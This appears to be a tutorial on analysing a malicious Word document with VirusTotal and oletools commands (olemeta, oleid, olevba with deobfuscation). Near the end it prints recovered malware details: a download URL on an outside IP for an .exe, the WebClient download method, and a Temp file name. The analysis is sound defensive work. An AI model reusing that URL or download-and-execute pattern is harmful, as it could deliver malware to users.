Malicious Document Analysis
Analyzing Office Documents
We are going to be using VirusTotal and command line tools like Olevba
sudo -H pip install -U oletools
MD5 Hash of the file we gonna analyze
First of all we can throw the file on Virus Total to see what we can get
On Virus Total we can see the behavior of the malware before we execute, and we see all the security vendors that are flagging the file as malicious.
Also, we can see more details about the file
On the Relations tab, we can see the contacted IP Addresses
This means, when we execute the file, he tries to connect these IP Addresses.
Now let’s go to the terminal and start our advanced static analysis First of all we gonna start using olemeta to see the metadata of the file
olemeta blog.doc
On the template field we can see the value ‘Normal.dotm’. ’m’ meaning macro
Next we gonna use oleid
oleid blog.doc
oleid tells us that the file has VBA Macros and is suspicious with risk High. On Description tell us to use olevba to analyse
olevba blog.doc
The output give us indicators that are in the VBA macros and highlight the suspicious keywords for us
IOC = Indicators of compromise.
Searching for these IP’s:
script trying to ping the IP
Now we can try decode all the malicious VBA Macro script
olevba blog.doc > blog.vba
olevba --deobf --reveal blog.vba > blog-deobf.vba
Using Visual Code we can open the file
After decoding we can see much more information
Looking at the code we can see a part of a url
If we search for ‘JASHDUIQWHDKJQAD’ in the code we find:
We can substitue the ‘JASHDUIQWHDKJQAD’ for ‘.44/upd/install’ in the entire code
After that we have the following code:
"strRT = ""http://91.220.131" + .44/upd/install + ".exe"""
Now we can do the same for the following piece
We found where is gonna save the file
Now we can clearly see what the malicious VBA Macro Script is doing
It’s trying to download a .exe file using the command ‘New-Object System.Net.WebClient’ and store it on the Temp directory with the name 444.exe